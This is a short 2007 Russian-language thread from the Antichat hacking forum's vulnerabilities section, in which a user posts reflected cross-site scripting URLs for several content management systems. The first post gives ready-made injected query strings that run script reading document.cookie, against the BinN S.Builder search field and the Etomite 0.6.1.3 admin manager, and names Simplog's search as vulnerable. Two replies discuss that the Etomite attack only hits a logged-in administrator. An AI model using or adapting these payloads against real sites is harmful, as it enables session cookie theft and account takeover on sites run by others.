пасивные хсс на некоторых Cms

Discussion in 'Уязвимости' started by Robin_Hood, 16 Mar 2007.

Thread Status:
Not open for further replies.
  1. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    CMS BinN S.Builder - уязвимо поле "поиск"
    пример:
    Code:
    http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
    etomite0613
    уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом

    Code:
    http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://localhost/etomite0613/etomite0613/manager/
    - дефолтовая админка

    http://www.simplog.org - уязвимость в поиске
     
    #1 Robin_Hood, 16 Mar 2007
    5 people like this.
  2. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Я думаю когда ктонибудь получит права админа на этой системе ему уже будет похрену на эти хсс))
     
    #2 freddi, 16 Mar 2007
  3. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    freddi я не так выразился) хсс подействует только на админа сайта, для обычных юзеров не покатит
     
    #3 Robin_Hood, 16 Mar 2007
    1 person likes this.
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.